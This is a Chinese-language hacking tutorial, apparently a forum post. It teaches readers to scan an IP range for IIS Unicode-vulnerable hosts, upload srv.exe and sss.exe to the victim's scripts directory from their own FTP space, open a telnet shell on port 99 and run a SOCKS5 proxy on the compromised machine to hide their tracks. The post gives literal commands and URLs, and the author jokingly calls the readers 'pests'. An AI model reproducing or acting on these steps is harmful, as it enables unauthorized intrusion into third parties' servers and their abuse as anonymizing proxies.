首先俺们要准备几个软件,最重要的还是大家应该去申请一个主页空间,支持FTP上传的,在这里我们用亿唐的主页空间做为本课程,做个连接方便大家下载吧!cgi.exe un.zip sss.exe srv.exe OK、开始操作,打开命令提示符、用98的个位朋友请打开MS-DOS 方式、这里我们以2000的命令提款符做为这次的课程吧!看图
俺喜欢把命令行工具放到DOS的目录里,方便使用,大家可以照着做,把命令调到E盘的DOS目录,然后输入命令,大家如果不明白cgi.exe是干嘛用的去使用说明里看看,告诉大家吧,是用来扫漏洞的命令行工具,目前俺见过最棒的命令行扫描工具,速度一级棒,快,是俺的兄弟《斜光》编写出来的,好,开始扫描unicode漏洞,我们输入以下的命令:e:\dos>cgi -uni 211.21.1.1 211.21.100.254 不懂就照着复制下来!看上面的图片,很快的就扫到了unicode漏洞主机,我们就拿他来做我们的隐身之物吧!好、看看他的页面,看图:
没有建立WEB服务的机子啊,不管他了,但我可提醒各位老大啊,人家还没搞主页,你可别黑人家,(啪、啪、多嘴)别打,俺不说就是了,好,接着来,页面也看到了,我们现在就上传文件,看图:
图片不是很清晰啊,(嘿,鸟虎仔啊,你怎么搞的,图片都搞不好)大家就别管它的了,大概讲一下就行了,HTTP服务器IP:虽然不是很清晰,但也看到了吧!是填有漏洞的主机IP的,上传到对方:这里我们就上传到他的可执行目录里吧!填入:c:\inetpub\scripts不懂的朋友照复制下来,存放上传文件FTP地址:这里要填的是你申请主页的FTP地址,我是用亿唐的空间,亿唐的FTP服务器是:homeftp.etang.com不用加FTP.这样的字符了,比方:你在http://www.51.net申请了空间,我们就接着输入:你的用户名.51.net 好了,接着用户名和密码就不多说了吧!申请主页空间服务商会给你的,再来,文件在FTP的完整路径:不要添加http://的符号了,把srv.exe和sss.exe两个文件上传到你的主页里!不包含文件夹,如果你要的话请设置文件的路径,在打个比方,(他奶奶的,怎么有那么多比方啊,)比方你上传到主页的kill目录里,那么就在路径里填上kill/srv.exe 开始上传,看上面的图片,应该看到了吧!文件已经上传到指定的目录里了,我可不保正100%的上传成功啊,一台不行,我们在换一台主机就是了!反正unicode漏洞主机比蚂蚁还多,要真的等到没有这样的漏洞,那我看大家已经毕业了,我们再接着讲,看图:
回到浏缆器上输入:http://211.21.1.3/scripts/srv.exe ---回车,这回主机已经开着99端口等着大家TELNET上去了。来、我们赶快TELNET上去,看图:
看到了没,输入:telnet 211.21.1.3 99 好,我们连接上去了!看图:
输入:sss -Debug 6736 ---回车,怎么没反应啊,你爽了啊!主机已经开了个6736的端口做为代理了,端口你可以自己选择,开心的话给他开个7626的端口啊,^_^ 好了!把命令提示符关了吧!赶快用SOCKS5的代理服务器验证吧!什么,不懂!去俺的主页OICQ教程里看看文章吧!哇~~用了一小时零六分终于写完了,我们是害虫、我们是害虫,来,大家一起高歌唱一句:因为菜,所以菜,我们都是大菜头,
:em25: |